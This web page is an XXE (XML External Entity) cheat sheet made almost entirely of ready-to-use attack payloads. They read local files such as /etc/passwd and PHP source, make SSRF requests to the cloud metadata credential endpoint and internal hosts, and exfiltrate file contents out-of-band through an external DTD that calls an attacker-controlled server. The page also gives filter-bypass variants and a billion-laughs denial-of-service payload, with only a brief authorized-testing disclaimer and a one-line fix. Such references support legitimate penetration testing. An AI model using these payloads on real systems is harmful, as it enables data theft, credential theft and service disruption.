CyberCheatsheets

XXE (XML External Entity) Cheat Sheet

XML External Entity payloads for file read, SSRF, blind out-of-band exfiltration, and denial of service on authorized targets.

Web Application SecurityinjectionowaspwebxmlxxeUpdated 2026-06-17

Overview

XXE abuses XML parsers that resolve external entities. If an endpoint accepts XML (SOAP, SAML, file uploads, REST with Content-Type: application/xml), you can define an external entity to read local files, reach internal services (SSRF), or exfiltrate data out-of-band when output isn't reflected. Always test by injecting a DOCTYPE with a custom entity.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Detect & read a local file

Classic file read — replace a reflected value with &xxe;

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><name>&xxe;</name></root>

Windows target file

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>

Base64 wrapper to read PHP source (avoids parse errors)

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>

SSRF via XXE

Hit the cloud metadata endpoint

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>

Reach an internal-only service

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/internal">]>

Blind / out-of-band (OOB)

External DTD hosted on your server (evil.dtd)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://10.10.14.5/?x=%file;'>">
%eval;
%exfil;

In-band stub that pulls the malicious DTD

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/evil.dtd"> %xxe;]>
<root>x</root>

Confirm OOB with a simple callback first

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/ping"> %xxe;]>

Variations & bypasses

Switch encoding to bypass naive keyword filters

<?xml version="1.0" encoding="UTF-16"?>

SVG upload XXE (image parsers often resolve entities)

<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><svg>&xxe;</svg>

SOAP request injection point

<soap:Body>...<!DOCTYPE ...>...&xxe;...</soap:Body>

If errors are verbose, error-based XXE can leak file contents in the error message

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Billion laughs (DoS — lab only)

Entity expansion DoS

<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">...]>

Destructive — only in an authorized, isolated lab.

Tips

  • If the value isn't reflected, go out-of-band: host an external DTD and exfiltrate to your server.
  • Use php://filter base64 when reading files that would otherwise break XML parsing.
  • Try changing Content-Type to application/xml on JSON endpoints — some parsers accept both.
  • Fix = disable DOCTYPE/external entity resolution in the XML parser (note in your report).

References

Chuletas relacionadas